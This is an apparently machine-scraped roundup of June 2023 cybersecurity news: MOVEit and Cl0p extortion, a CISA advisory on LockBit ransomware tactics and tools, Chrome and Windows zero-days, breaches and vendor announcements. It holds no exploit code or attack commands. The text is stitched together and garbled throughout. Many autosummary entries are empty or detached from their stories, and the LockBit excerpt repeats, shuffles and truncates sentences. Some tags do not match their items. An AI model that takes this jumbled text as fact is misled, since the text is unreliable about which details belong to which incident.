Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, MOVEit Transfer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "As more victim organizations of Cl0p gang’s MOVEit rampage continue popping up, security researchers have released a PoC exploit for CVE-2023-34362, the RCE vulnerability exploited by the Cl0p cyber extortion group to plunder confidential data. CVE-2023-34362 PoC exploit released Horizon3 security researchers have released proof-of-concept (PoC) exploit code for CVE-2023-34362, as well as technical root cause analysis of the flaw. Rapid7 has released an analysis of the vulnerability and a full exploit chain for CVE-2023-34362. … More
The post PoC exploit for exploited MOVEit vulnerability released (CVE-2023-34362) appeared first on Help Net Security.
"Autosummary:
“Firstly, this would harm their reputations among the wider public for engaging with Russian cybercriminals, while, secondly, the reality is this data is now in the hands of criminals, and whether a ransom is paid or not, there are never any guarantees it will be deleted. "Autosummary:
The three-year sting operation, dubbed Trojan Shield, led to more than 800 arrests across 18 countries following an analysis of over 27 million messages that involved discussions on narcotics concealment methods, shipments of narcotics, money laundering, and even violent threats. "Autosummary:
"Autosummary:
" UNC3886 VMware zero-day attack (click to see full size)—Mandiant In March, Mandiant also revealed that the Chinese UNC3886 hackers abused a zero-day vulnerability (CVE-2022-41328) in the same mid-2022 campaign to compromise FortiGate firewall devices and deploy previously unknown Castletap and Thincrust backdoors. "Autosummary:
"Autosummary:
At various times from at least in or about May 2012 through in or about November 2012, PAUNESCU maintained a database which described certain servers that he controlled or leased as being used for "spyeye 100%SBL," "zeus 100%SBL," 100%sbl, phising [sic]," "100%SBL malware," and "fake av [antivirus] 100%SBL," reads the DoJ indictment obtained by BleepingComputer. "Autosummary:
The brands impersonated by the phony sites include Nike, Puma, Asics, Vans, Adidas, Columbia, Superdry Converse, Casio, Timberland, Salomon, Crocs, Sketchers, The North Face, UGG, Guess, Caterpillar, New Balance, Fila, Doc Martens, Reebok, Tommy Hilfiger, and others. "Cynerio collaborates with Microsoft to integrate with their cloud-native SIEM and SOAR offering Microsoft Sentinel. This collaboration aims to provide the healthcare industry with a comprehensive solution to address the growing security challenges posed by medical and IoT devices. As Leon Lerman, CEO of Cynerio, explains, “Medical and IoT devices are a black hole in the network that traditional IT security and inventory systems simply do not cover. As a result, customers are often left … More
The post Cynerio partners with Microsoft to ensure the security of medical and IoT devices appeared first on Help Net Security.
"Autosummary:
"Dragos launched the Dragos Global Partner Program to comprise OT cybersecurity technology, services, and threat intelligence. The Dragos Partner Program extends even further by offering training that prepares partners as experts who can offer their customers assessment services based on Dragos’s proven assessment methodology; resell the Dragos Platform including asset discovery, threat detection, and vulnerability management; and manage deployment for customers. The Dragos Partner Program enables channel partners to offer their customers the full range … More
The post Dragos Partner Program helps users strengthen OT cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 17 Elevation of Privilege Vulnerabilities 3 Security Feature Bypass Vulnerabilities 32 Remote Code Execution Vulnerabilities 5 Information Disclosure Vulnerabilities 10 Denial of Service Vulnerabilities 10 Spoofing Vulnerabilities 1 Edge - Chromium Vulnerabilities This list does not include sixteen Microsoft Edge vulnerabilities previously fixed on June 2nd, 2023. "Google has announced the Google Cyber NYC Institutional Research Program, allocating $12 million to stimulate the cybersecurity ecosystem and establish New York City as the global leader in cybersecurity. The $12 million will go towards research conducted at four of the city’s leading institutions of higher education. It will also be used to expand educational opportunities for students seeking advanced degrees in cybersecurity. As part of this commitment, The City University of New York, Columbia … More
The post Google grants $12 million to bolster NYC’s cybersecurity ecosystem appeared first on Help Net Security.
"Autosummary:
“We believe NYC will be the epicenter for next-generation research, students, and startups in cyber, trust, and safety, and we applaud Google for its leadership and unwavering support for Cornell University,” Morrisett added. "St. Margaret’s Health in Illinois is partly closing operations at its hospitals due to a 2021 ransomware attack that impacted its payment system. In February 2021a ransomware attack hit the St. Margaret’s Health in Illinois and forced the organization to shutdown of IT infrastructure at the Spring Valley hospital to contain the threat. The cyber […]
The post St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for its closure appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, hospital) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
These addresses were extracted from the following Windows ISO shared on torrent sites, but Dr. Web warns that there could be more out there: Windows 10 Pro 22H2 19045.2728 + Office 2021 x64 by BoJlIIIebnik RU.iso Windows 10 Pro 22H2 19045.2846 + Office 2021 x64 by BoJlIIIebnik RU.iso Windows 10 Pro 22H2 19045.2846 x64 by BoJlIIIebnik RU.iso Windows 10 Pro 22H2 19045.2913 + Office 2021 x64 by BoJlIIIebnik [RU, EN].iso Windows 10 Pro 22H2 19045.2913 x64 by BoJlIIIebnik [RU, EN].iso Pirated OS downloads should be avoided because they can be dangerous, as those who create the unofficial builds can easily hide persistent malware. "Autosummary:
"The Play ransomware attack suffered by the IT services provider Xplain also impacted the national railway company of Switzerland (FSS) and the canton of Aargau. The Play ransomware attack suffered by the IT services provider Xplain is worse than initially estimated, the incident also impacted the national railway company of Switzerland (FSS) and the canton […]
The post Xplain data breach also impacted the national Swiss railway FSS appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, xPlay) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
What"s more, ScrubCrypt is designed to be interoperable with various well-known malware families like Amadey, AsyncRAT, DarkCrystal RAT, Pure Miner, Quasar RAT, RedLine Stealer, Remcos RAT, SmokeLoader, VenomRAT, and Warzone RAT. "Autosummary:
The list of organizations that have disclosed data breaches following these attacks includes, among others, the EY British multinational, the Irish Health Service Executive (HSE) public healthcare system, UK-based provider of payroll and HR solutions Zellis and some of its customers (i.e., UK"s flag carrier British Airways, Irish flag carrier Aer Lingus, and the Minnesota Department of Education). "Autosummary:
"Autosummary:
"Researchers detailed a fully undetectable (FUD) malware obfuscation engine named BatCloak that is used by threat actors. Researchers from Trend Micro have analyzed the BatCloak, a fully undetectable (FUD) malware obfuscation engine used by threat actors to stealthily deliver their malware since September 2022. The samples analyzed by the experts demonstrated a remarkable ability to persistently evade […]
The post FUD Malware obfuscation engine BatCloak continues to evolve appeared first on Security Affairs.
"Autosummary:
ScrubCrypt is designed to include testing on a host of popular pieces of malware such as Amadey, AsyncRAT, DarkCrystal RAT, Pure Miner, Quasar RAT, RedLine Stealer, Remcos RAT, SmokeLoader, VenomRAT, and Warzone RAT (aka Ave Maria). "Autosummary:
Hunt told BleepingComputer that the database contains Zacks customers" email addresses, usernames, unsalted SHA256 passwords, addresses, phone numbers, first and last names, and other data. "Autosummary:
After disappointing its staff in a recent round of pay reviews that either granted zero rises or “tiny percentages on already way-below-market rates”, workers were delighted to receive an email entitled “Important notice: Salary increase.” "Intellihartx is notifying about 490,000 individuals that their personal information was compromised in the GoAnywhere zero-day attack in January. The Clop ransomware group has stolen stole personal and health information of 489,830 individuals as a result of a ransomware attack on the technology firm Intellihartx. The attack took place earlier this year, the attackers have […]
The post Intellihartx data breach exposed the personal and health info of 490,000 individuals appeared first on Security Affairs.
"Autosummary:
The Cl0p cybergang has also claimed responsibility for the recent MOVEit Transfer MFT zero-day attack, which impacted several major organizations, including Irish airline Aer Lingus, British Airways, the BBC, UK-based payroll and HR company Zellis, and the Canadian province of Nova Scotia. "Autosummary:
"At this time we are not linking FG-IR-23-097 to the Volt Typhoon campaign, however Fortinet expects all threat actors, including those behind the Volt Typhoon campaign, to continue to exploit unpatched vulnerabilities in widely used software and devices," the company said. "Categories: Personal Tags: strava Tags: fitness Tags: health Tags: run Tags: running Tags: jog Tags: jogging Tags: jogger Tags: cycling Tags: bike Tags: race Tags: data Tags: anonymous Tags: anonymise Tags: location Tags: map Tags: heatmap Anonymous data on fitness app Strava"s heatmap may be able to be used to pinpoint users. |
The post Strava heatmap loophole may reveal users" home addresses appeared first on Malwarebytes Labs.
"Autosummary:
Strava, used by more than 100 million people, includes features you’d commonly see in this kind of product like heart rate, GPS data, and so on. This, combined with public profiles displaying real names, photographs, and data related to specific activities means that singling out certain users was achievable. "In 2022, LockBit was the most deployed ransomware variant across the world and continues to be prolific in 2023. Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. LockBit ransomware operation functions as a Ransomware-as-a-Service (RaaS) model where affiliates are recruited to conduct ransomware attacks using LockBit ransomware tools and infrastructure. Due to the large number of unconnected affiliates in the operation, LockBit ransomware attacks vary significantly in observed tactics, techniques, and procedures (TTPs). This variance in observed ransomware TTPs presents a notable challenge for organizations working to maintain network security and protect against a ransomware threat.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international partners, hereafter referred to as “authoring organizations,” are releasing this Cybersecurity Advisory (CSA) detailing observed activity in LockBit ransomware incidents and providing recommended mitigations to enable network defenders to proactively improve their organization’s defenses against this ransomware operation.
The authoring organizations encourage the implementation of the recommendations found in this CSA to reduce the likelihood and impact of future ransomware incidents.
Autosummary: PaperCut MF/NG Improper Access Control Vulnerability LockBit affiliates have been documented exploiting numerous CVEs, including: CVE-2021-44228: Apache Log4j2 Remote Code Execution Vulnerability, CVE-2021-22986: F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability, CVE-2020-1472: NetLogon Privilege Escalation Vulnerability, CVE-2019-0708: Microsoft Remote Desktop Services Remote Code Execution Vulnerability, and CVE-2018-13379: The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international partners, hereafter referred to as “authoring organizations,” are releasing this Cybersecurity Advisory (CSA) detailing observed activity in LockBit ransomware incidents and providing recommended mitigations to enable network defenders to proactively improve their organization’s defenses against this ransomware operation.Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation.[1] A RaaS cybercrime group maintains the functionality of a particular ransomware variant, sells access to that ransomware variant to individuals or groups of operators (often referred to as “affiliates”), and supports affiliates’ deployment of their ransomware in exchange for upfront payment, subscription fees, a cut of profits, or a combination of upfront payment, subscription fees, and a cut of profits. Table 3: ANSSI-Observed LockBit Strain and Number of Instances Name of the Strain* Number of Instances LockBit 2.0 (LockBit Red) 26 LockBit 3.0 (LockBit Black) 23 LockBit 21 LockBit Green 1 LockBit (pre-encryption) 1 Total 72** * Name either obtained from ANSSI’s or the victim’s investigations ** Includes incidents with multiple strains Figure 1: ANSSI-Observed LockBit Strains by Year From the incidents handled, ANSSI can infer that LockBit 3.0 widely took over from LockBit 2.0 and the original LockBit strain from 2022.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.In the Initial Access phase, mitigations working together to deny an attacker network access include securing internet-exposed services, patching devices, implementing MFA, disabling macros, employing application allowlisting, and using logging and alerting. LockBit Statistics Percentage of ransomware incidents attributed to LockBit: Australia: From April 1, 2022, to March 31, 2023, LockBit made up 18% of total reported Australian ransomware incidents.[7] April 2023 LockBit ransomware encryptors targeting macOS seen on VirusTotal [8, 9] LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker are still available for affiliates’ use on LockBit’s panel. Defense Evasion Apply local security policies to control application execution (e.g., Software Restriction Policies (SRP), AppLocker, Windows Defender Application Control (WDAC)) with a strict allowlist. Critical Controls Key Figure 3: Stopping Ransomware Using Layered Mitigations Validate Security Controls In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. United States: In 2022, 16% of the State, Local, Tribal, and Tribunal (SLTT) government ransomware incidents reported to the MS-ISAC were identified as LockBit attacks. Table 2: ANSSI-Observed LockBit vs. Overall Ransomware Activity Year Number of Incidents Percentage of CERT-FR’s Ransomware-Related Activity 2020 (from July) 4 2% 2021 20 10% 2022 30 27% 2023 15 27% Total (2020-2023) 69 11% Table 3 shows the number of instances different LockBit strains were observed by ANSSI from July 2020 to present. Impact Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud)T1048 Exfiltration Over Alternative Protocol Common Vulnerabilities and Exposures (CVEs) Exploited Based on secondary sources, it was noted that affiliates exploit older vulnerabilities like CVE-2021-22986, F5 iControl REST unauthenticated Remote Code Execution Vulnerability, as well as newer vulnerabilities such as: CVE-2023-0669:Impair Defenses: Disable or Modify Tools T1562.001 LockBit 3.0 affiliates use Backstab, Defender Control, GMER, PCHunter, PowerTool, Process Hacker or TDSSKiller to disable EDR processes and services.In particular, you can no longer use New Technology Local Area Network (LAN) Manager (NTLM) classic authentication single sign-on, Kerberos unconstrained delegation, as well as Data Encryption Standard (DES) encryption.In particular, you can no longer use New Technology Local Area Network (LAN) Manager (NTLM) classic authentication single sign-on, Kerberos unconstrained delegation, as well as Data Encryption Standard (DES) encryption. (e.g., Software Restriction Policies (SRP), AppLocker, Windows Defender Application Control (WDAC)) with a strict allowlist.System Information Discovery T1082 LockBit affiliates will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.When repurposed by LockBit, these tools are then used for a range of malicious cyber activity, such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration.In the Consolidation and Preparation phase, mitigations working together to keep an attacker from accessing network devices are patching devices, using network segmentation, enforcing the principle of least privilege, implementing MFA, and using logging and alerting. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) References [1] LockBit, BlackCat, and Royal Dominate the Ransomware Scene [2] Ransomware Diaries: Volume 1 [3] What is LockBit ransomware and how does it operate? (MFA) for all services to the extent possible, particularly for webmail, virtual private networks, and privileged accounts that access critical systems [CPG 2.H].This included ransomware incidents impacting municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement). with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST standards for developing and managing password policies [CPG 2.L].For example, account use polices are mitigations for initial access, persistence, privilege escalation, and credential access but would be listed under initial access mitigations.Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 LockBit affiliates use (1) Rclone, an open-source command line cloud storage manager or FreeFileSync to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration. Table 15: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Exfiltration Technique Title ID Use Exfiltration TA0010 LockBit affiliates use StealBit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network. "
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Cl0p announces rules for extortion negotiation after MOVEit hack The Cl0p cyber extortion crew says that the many organizations whose data they have pilfered by exploiting a vulnerability in the MOVEit Transfer solution have until June 14 to get in contact with them – or they will post their name on their dedicated leak page. 0mega ransomware gang changes tactics … More
The post Week in review: 9 free cybersecurity whitepapers, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Introducing the book: Creating a Small Business Cybersecurity Program, Second Edition In this Help Net Security video interview, Alan Watkins, CIS Controls Ambassador, CIS, talks about his new book – Creating a Small Business Cybersecurity Program, Second Edition. New infosec products of the week: June 9, 2023 Here’s a look at the most interesting products from the past week, featuring releases from 1Password, Datadog, Enveedo, Lacework, and NinjaOne. "Pro-Ukraine hackers Cyber Anarchy Squad claimed responsibility for the attack that hit Russian telecom provider Infotel JSC. Pro-Ukraine hacking group Cyber.Anarchy.Squad claimed responsibility for an attack on Russian telecom provider Infotel JSC. The company provides connectivity services to the Russian banking system, for this reason, the attack had a severe impact on the operations of […]
The post Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cyberattack) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
In 2018, Strava implemented a feature called "heatmap" that anonymously aggregates users" (runners, cyclists, hikers) activity to help users find trails or exercise hotspots, meet like-minded individuals, and perform their sessions in more crowded and safer locations. "Microsoft researchers warn of banking adversary-in-the-middle (AitM) phishing and BEC attacks targeting banking and financial organizations. Microsoft discovered multi-stage adversary-in-the-middle (AiTM) phishing and business email compromise (BEC) attacks against banking and financial services organizations. In AiTM phishing, threat actors set up a proxy server between a target user and the website the user wishes to […]
The post Microsoft warns of multi-stage AiTM phishing and BEC attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cyberattack) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"The University of Manchester suffered a cyberattack, attackers likely stole staff and students’ data from its systems. The University of Manchester, one of the UK’s largest educational institutions, suffered a cyberattack, The popular university suspects that the threat actors have stolen data from its systems. The University of Manchester has about 11,000 staff and more […]
The post The University of Manchester suffered a cyber attack and suspects a data breach appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cyberattack) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"As cyberattacks intensify, more and more organizations recognize the need to have a strong security culture for all employees, according to Fortinet. Employee cybersecurity awareness The most recent report from Fortinet’s FortiGuard Labs found that ransomware threats remain at peak levels with no evidence of slowing down globally. At the same time, Fortinet found that 84% of organizations experienced one or more breaches in 2022. The latest research from Fortinet reveals that more than 90% … More
The post Employee cybersecurity awareness takes center stage in defense strategies appeared first on Help Net Security.
"Autosummary:
Lack of cybersecurity knowledge among employees 81% of organizations faced malware, phishing, and password attacks last year which mainly were targeted at users. "In this Help Net Security video interview, Alan Watkins, CIS Controls Ambassador, CIS, talks about his new book – Creating a Small Business Cybersecurity Program, Second Edition. This book provides guidance and essential steps small businesses with 25-50 employees should implement, from creating governance documents to policies and procedures. Watkins devotes four chapters to the CIS Controls and CIS Safeguards in Implementation Group 1 (IG1) and discusses risk management using the CIS Risk Assessment Method … More
The post Introducing the book: Creating a Small Business Cybersecurity Program, Second Edition appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Guardz has unveiled a new AI-powered Multilayered Phishing Protection solution to help small and medium-sized enterprises (SMEs) and managed service providers (MSPs) prevent phishing attacks before their security is compromised. The solution uses AI to provide small businesses and the MSPs that support them with automatic detection and remediation capabilities to protect against phishing attacks – the number one threat they face. By combining email security, web browsing protection, perimeter posture, and awareness culture in … More
The post Guardz launches AI-powered Multilayered Phishing Protection to secure SMEs appeared first on Help Net Security.
"Autosummary:
"This week, the Japanese pharmaceutical giant Eisai has taken its systems offline in response to a ransomware attack. Eisai is a Japanese pharmaceutical company with about 10,000 employees and more than $5 billion in revenue. The company this week was forced to take certain systems offline in response to a cyber attack In response to the ransomware […]
The post Japanese Pharmaceutical giant Eisai hit by a ransomware attack appeared first on Security Affairs.
"Autosummary:
"Researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since 2021. Kroll security experts discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since 2021. Kroll investigated the exploitation attempts for the MOVEit Transfer vulnerability and discovered that Clop threat […]
The post Clop ransomware gang was testing MOVEit Transfer bug since 2021 appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Clop ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “Kroll assesses with high confidence that the MOVEit Transfer exploit as it exists today: Was available and being used/tested in April 2022 Was available and being used/tested in July 2021″ This week, the Clop ransomware group claimed to have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer software. "Autosummary:
The University says they informed all relevant authorities, including the Information Commissioner"s Office, the National Cyber Security Centre (NCSC), and the National Crime Agency, about the security and data breach. "Autosummary:
Join the Session "This attack shows the complexity of AiTM and BEC threats, which abuse trusted relationships between vendors, suppliers, and other partner organizations with the intent of financial fraud," the company added. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @serghei, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @demonslay335, @DanielGallagher, @fwosar, @billtoulas, @KrollWire, @Mar_Pich, @RedSenseIntel, @CISAgov, @FBI, @MsftSecIntel, @pcrisk, @TrendMicro, @PogoWasRight, @catabatarce, @GossiTheDog, @BrettCallow, and @uptycs. June 7th 2023 According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software"s managed file transfer (MFT) solution known as MOVEit Transfer. "Autosummary:
"In total, the company has about four hundred clients, a quarter of them are banks, the rest are credit institutions, car dealerships. "Categories: Ransomware Categories: Threat Intelligence May saw a record number of 556 reported ransomware victims, the unusual emergence of Italy and Russia as major targets, and a significant rise in attacks on the education sector. |
The post Ransomware review: June 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks against education, June 2022-May 2023 Between June 2022 and May 2023, Vice Society attacked more education targets than any other gang—a specialization that should alarm schools, colleges, and universities everywhere. Known ransomware attacks by country, May 2023 Known ransomware attacks by industry sector, May 2023 Italy and Russia emerge as targets The upswing in ransomware activity in Italy and Russia in May is striking.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Posted: June 9, 2023 by May saw a record number of 556 reported ransomware victims, the unusual emergence of Italy and Russia as major targets, and a significant rise in attacks on the education sector. BalckSuit could be a new variant developed by Royal"s authors, a mimicry attempt using similar code, an affiliate of the Royal ransomware gang running its own modifications, or even a breakaway group from the Royal ransomware gang. Predominantly targeting small and medium-sized businesses (SMBs), 8Base has attacked mainly companies within the Professional/Scientific/Technical sector, comprising 36% of known attacks, followed by Manufacturing at 17%. "Categories: Exploits and vulnerabilities Categories: News Tags: Cisco Tags: anyconnect Tags: system secure client Tags: VPN Tags: bug Tags: patch Tags: update Tags: vulnerability Tags: SYSTEM We take a look at a recent update for Cisco Secure System Client and why you should apply the update as soon as possible. |
The post Update your Cisco System Secure Client now to fix this AnyConnect bug appeared first on Malwarebytes Labs.
"Autosummary:
Cisco AnyConnect Secure Mobility Client for Linux Cisco AnyConnect Secure Mobility Client for MacOS Cisco Secure Client-AnyConnect for Android Cisco Secure Client AnyConnect VPN for iOS Cisco Secure Client for Linux Cisco Secure Client for MacOS This issue has been resolved with the release of Cisco Secure Client for Windows 5.0MR2, and AnyCOnnect Secure Mobility Client for Windows 4.10MR7. "Two Russian nationals have been charged with the hack of the cryptocurrency exchange Mt. Gox in 2011 and money laundering. Russian nationals Alexey Bilyuchenko (43) and Aleksandr Verner (29) have been charged with the hack of the cryptocurrency exchange Mt. Gox in 2011 and the operation of the illicit cryptocurrency exchange BTC-e. The duo has […]
The post Russians charged with hacking Mt. Gox exchange and operating BTC-e appeared first on Security Affairs.
"Autosummary:
"Despite prevailing economic headwinds, the market for cybersecurity products and services remains buoyant, according to CCgroup. The study found that 78% of enterprises in the U.S. and 58% in the UK have increased cybersecurity investment in the last year, while 81% of enterprises are looking to work with new vendors in the next 12 months. The top three solutions for investment are endpoint security, application security and fraud prevention. However, despite searching for new suppliers, … More
The post Top factors driving enterprise demand for new cybersecurity technology appeared first on Help Net Security.
"Autosummary:
Long-form content is crucial to cybersecurity vendors’ content strategies Long-form copy – written either by vendors or industry analysts – proved to be the most popular, with blogs emerging as the winner in both markets (92% in the U.S. and 93% in the UK), followed by industry analyst reports (88% overall) and case studies (87% overall). "Open-source GitHub cybersecurity projects, developed and maintained by dedicated contributors, provide valuable tools, frameworks, and resources to enhance security practices. From vulnerability scanning and network monitoring to encryption and incident response, the following collection encompasses a diverse range of projects that can aid individuals and organizations in safeguarding their digital assets. ATT&CK Navigator The ATT&CK Navigator allows users to navigate and annotate ATT&CK matrices, similar to using Excel. It provides a way to visualize defensive … More
The post 20 cybersecurity projects on GitHub you should check out appeared first on Help Net Security.
"Autosummary:
Identification of system vulnerabilities Provides information on the servers that are affected Automated vulnerability detection Regular vulnerability reporting using methods like CRON Wazuh Wazuh is a free and open-source platform that offers threat prevention, detection, and response capabilities. Vuls Vuls is a vulnerability scanner designed for Linux, FreeBSD, Container, WordPress, Programming language libraries, and Network devices. It offers the following features: Clear overview of running processes and resource usage Detailed system information and graphs Views and edits services Other features useful for debugging and analyzing software Tink Tink is an open-source cryptography library developed by Google’s cryptographers and security engineers. It has many advanced features: a completely custom binary template and pattern language to decode and highlight structures in the data, a graphical node-based data processor to pre-process values before they’re displayed, a disassembler, diffing support, bookmarks and much much more.It is designed to provide an initial and rapid assessment of malware samples, URLs, IP addresses, domains, malware families, IOCs, and hashes. The generated output is consolidated into a single CSV timeline, facilitating analysis in popular tools such as LibreOffice, Timeline Explorer, Elastic Stack, Timesketch, and others. "Autosummary:
BlackSuit ransomware data leak site Source: BleepingComputer However, a rebrand would no longer make sense, as a recent report by Trend Micro has shown clear similarities between the BlackSuit and Royal Ransomware encryptors, making it hard to convince anyone that they are a new ransomware operation. "Cisco addressed a high-severity flaw in Cisco Secure Client that can allow attackers to escalate privileges to the SYSTEM account. Cisco has fixed a high-severity vulnerability, tracked as CVE-2023-20178 (CVSS Score 7.8), found in Cisco Secure Client (formerly AnyConnect Secure Mobility Client) that can be exploited by low-privileged, authenticated, local attacker to escalate privileges to […]
The post Cisco fixes privilege escalation bug in Cisco Secure Client appeared first on Security Affairs.
"Autosummary:
"Autosummary:
A weekend ransomware attack In a notification posted to their website, Eisai disclosed that they suffered a ransomware attack over the weekend, a typical time for attackers to deploy encryptors as IT teams are understaffed and unable to respond effectively to the rapidly evolving situation. "Autosummary:
Their advice: Think government officials, intelligence experts, and “brain candy”—i.e., whatever challenges thinking, inspires creativity, and/or nurtures mental health.At mWISE, which runs from September 18–20, 2023 in Washington, D.C., frontline security experts from both the public and private sectors will experience a level of collaboration that doesn’t happen elsewhere. "Autosummary:
"Autosummary:
"Several of these hosts are associated with high-profile organizations, including multiple Fortune 500 companies and both state and federal government agencies," Censys noted, highlighting finance, technology, and healthcare as the sectors with the most exposures. "Autosummary:
"Autosummary:
Clop collecting victim info in April 2022 (Kroll) "Kroll observed activity consistent with MOVEit Transfer exploitation that collectively occurred on April 27, 2022; May 15–16, 2023; and May 22, 2023, indicating that actors were testing access to organizations via likely automated means and pulling back information from the MOVEit Transfer servers to identify which organization they were accessing," the report reveals. "Autosummary:
Re-discovering the flaw While the vulnerability is actively exploited, Microsoft says it only affects older versions of Windows, including older Windows 10 versions, Windows Server, and Windows 8, and does not affect Windows 11. "Researchers published an exploit for an actively exploited Microsoft Windows vulnerability tracked as CVE-2023-29336. The Microsoft Windows vulnerability CVE-2023-29336 (CVSS score 7.8) is an elevation of privilege issue that resides in the Win32k component. Win32k.sys is a system driver file in the Windows operating system. The driver is responsible for providing the interface between user-mode applications and […]
The post Researchers published PoC exploit code for actively exploited Windows elevation of privilege issue appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Kimsuky) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Personal Tags: sextortion Tags: deepfake Tags: FBI Tags: blackmail Tags: extortion Tags: fake Tags: fakes Tags: synthetic We take a look at some new developments in sextortion cases via a warning issued by the FBI. |
The post Warning: Victims" faces placed on explicit images in sextortion scam appeared first on Malwarebytes Labs.
"Autosummary:
Here’s how the FBI describes sextortion: Sextortion, which may violate several federal criminal statutes, involves coercing victims into providing sexually explicit photos or videos of themselves, then threatening to share them publicly or with the victim"s family and friends. The more traditional form of sextortion is where a fraudster convinces the person they’re speaking to that they’re interested in romance, obtains revealing images of the victim, and then uses those images for blackmail.From the release: The FBI continues to receive reports from victims, including minor children and non-consenting adults, whose photos or videos were altered into explicit content. "Categories: Exploits and vulnerabilities Categories: News Tags: Google Tags: Chrome Tags: V8 Tags: heap corruption Tags: type confusion Tags: CVE-2023-3079 Google has released a Chrome update for a zero-day for which an exploit is actively being used in the wild. |
The post Update Chrome now! Google patches actively exploited zero-day appeared first on Malwarebytes Labs.
"Autosummary:
How to protect yourself If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. Users of other Chromium based browsers, like Edge, should be on the lookout for updates as well, as this one is likely to affect all Chromium based browsers. "In this Help Net Security video, Ed Adams, CEO of Security Innovation, discusses the shifts in cybersecurity training. 60% of companies now include realistic simulations in their cybersecurity training programs compared to 36% in 2020. According to Security Innovation research, organizations increasingly embrace realistic simulations in training programs. Respondents ranked this feature as highly effective and delivering the most significant ROI compared with other cybersecurity training program components.
The post Embracing realistic simulations in cybersecurity training programs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Google has fixed a high-severity vulnerability in the Chrome browser (CVE-2023-3079) that is being exploited by attackers. About the vulnerability CVE-2023-3079 is a vulnerability that stems from a type confusion in the V8 JavaScript engine, and has been uncovered by Clément Lecigne of Google’s Threat Analysis Group (TAG), a “task-force” dedicated to protecting users from state-sponsored malware attacks and other advanced persistent threats. “Google is aware that an exploit for CVE-2023-3079 exists in the wild,” … More
The post Exploited zero-day patched in Chrome (CVE-2023-3079) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
